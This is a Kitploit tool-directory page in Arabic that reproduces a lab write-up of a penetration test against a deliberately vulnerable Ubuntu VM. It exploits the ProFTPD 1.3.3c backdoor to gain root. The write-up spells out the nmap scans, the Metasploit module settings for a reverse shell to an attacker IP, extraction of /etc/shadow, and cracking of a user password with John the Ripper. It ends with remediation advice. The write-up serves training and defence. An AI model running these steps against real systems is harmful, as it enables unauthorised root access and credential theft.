Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Offensive-lab-2 — دليل اختبار اختراق على جهاز Ubuntu افتراضي قابل للاختراق. تم استغلال الثغرة الخلفية ProFTPD 1.3.3c (CVE-2010-4221) للحصول على صلاحيات الجذر والحصول على العلم. يتضمن تعداد Nmap، إعداد حمولة Metasploit، وكسر تجزئة المستخدمين (John the Ripper). | Kitploit
أدوات/GitHubGitHub/mafiosohack/offensive-lab-2
كسر كلمات المرورالاستطلاعأطر الاستغلالمسح المنافذتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالCTFاختبار الاختراق

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
التعلم والتعليم
مختبرات وتدريب عملي
GitHubmafiosohack/offensive-lab-2

Offensive-lab-2

دليل اختبار اختراق على جهاز Ubuntu افتراضي قابل للاختراق. تم استغلال الثغرة الخلفية ProFTPD 1.3.3c (CVE-2010-4221) للحصول على صلاحيات الجذر والحصول على العلم. يتضمن تعداد Nmap، إعداد حمولة Metasploit، وكسر تجزئة المستخدمين (John the Ripper).

عرض المستودع
5منذ 9 أشهرلم تتم المراجعة بعد

مختبر الأمن الهجومي : استغلال الباب الخلفي لـ ProFTPD 1.3.3c (علم الجذر)

  1. المقدمة والأهداف

يقدم هذا التقرير تفاصيل اختبار الاختراق الذي تم إجراؤه على آلة افتراضية (VM) ضعيفة تعمل بنظام لينكس، مع التركيز على تحديد ثغرة خدمة عالية المخاطر سمحت بالوصول الفوري إلى صلاحيات الجذر.

التفاصيلالقيمة
عنوان IP الهدف[ 192.168.222.130]
عنوان IP المهاجم (LHOST)[ 192.168.222.128]
نظام التشغيل المستهدفUbuntu 4ubuntu2.2 (نواة لينكس 3.x)
الهدفالحصول على شل بمستوى الجذر واسترجاع ملف العلم.
  1. التعداد الأولي وتحديد الثغرات

تضمن الاستطلاع الأولي فحص الخدمات باستخدام Nmap لتحديد المنافذ المفتوحة وإصدارات الخدمات.

الأمر:

root@kitploit:~
sudo nmap -sS -sV 192.168.222.130
النتائج الرئيسية:
 | المنفذ | الخدمة | الإصدار | المخاطرة | | :--- | :--- | :--- | :---
 | 21/tcp | ftp | ProFTPD 1.3.3c | حرج (باب خلفي قابل للاستغلال) |
 | 22/tcp | ssh | OpenSSH 7.2p2 | منخفضة (خدمة قياسية) |
 | 80/tcp | http | Apache httpd 2.4.18 | منخفضة (لم يتم العثور على ثغرة ويب واضحة) |

أكد فحص نصوص الثغرات اللاحق وجود باب خلفي شديد الخطورة داخل خدمة FTP.
أظهر إخراج نص Nmap بوضوح تنفيذ الأوامر كمستخدم جذر:

| ftp-proftpd-backdoor: 
|   هذا التثبيت يحتوي على باب خلفي.
|   الأمر: id
|_  النتيجة: uid=0(root) gid=0(root) groups=0(root)...

3. الاستغلال والحصول على شل الجذر

تم استخدام إطار Metasploit للاستفادة من الباب الخلفي المؤكد لـ ProFTPD.

خطوات الاستغلال:
إطلاق Metasploit: msfconsole

تحديد وحدة الاستغلال: use exploit/unix/ftp/proftpd_133c_backdoor

ضبط الخيارات:

Bash

set RHOSTS 192.168.222.130
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.222.128

النتيجة: تم إنشاء جلسة شل أوامر بنجاح، مع منح صلاحيات جذر فورية (uid=0).

4. ما بعد الاستغلال واسترجاع العلم
جمع بيانات الاعتماد
تم استخراج تجزئات المستخدمين من /etc/shadow لتحليل ما بعد الاستغلال. تم كسر تجزئة المستخدم marlinspike بنجاح باستخدام John the Ripper.

الأمر المستخدم (على آلة المهاجم):

Bash

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
بيانات الاعتماد المكسورة:

المستخدم: marlinspike

كلمة المرور: marlinspike

5. توصيات العلاج
وضع الأمان للنظام ضعيف للغاية بسبب خدمة FTP المخترقة. يجب اتخاذ خطوات فورية لتأمين النظام:

التصحيح/الترقية الفورية: يجب تصحيح أو ترقية خدمة ProFTPD فورًا إلى إصدار آمن (أكبر من 1.3.3g) لإصلاح الباب الخلفي المعروف وCVEs ذات الصلة.

إزالة الخدمة: إذا لم تكن FTP مطلوبة لوظيفة النظام، فيجب إزالة الخدمة بالكامل.

جدار الحماية: تنفيذ قواعد جدار حماية صارمة (iptables/ufw) لحظر الوصول الخارجي إلى المنفذ 21.

تكوينات شل آمنة: مراجعة تكوينات SSH لتعطيل تسجيل الدخول كجذر وفرض المصادقة القائمة على المفاتيح.
Execute: exploit
تنزيل الأداة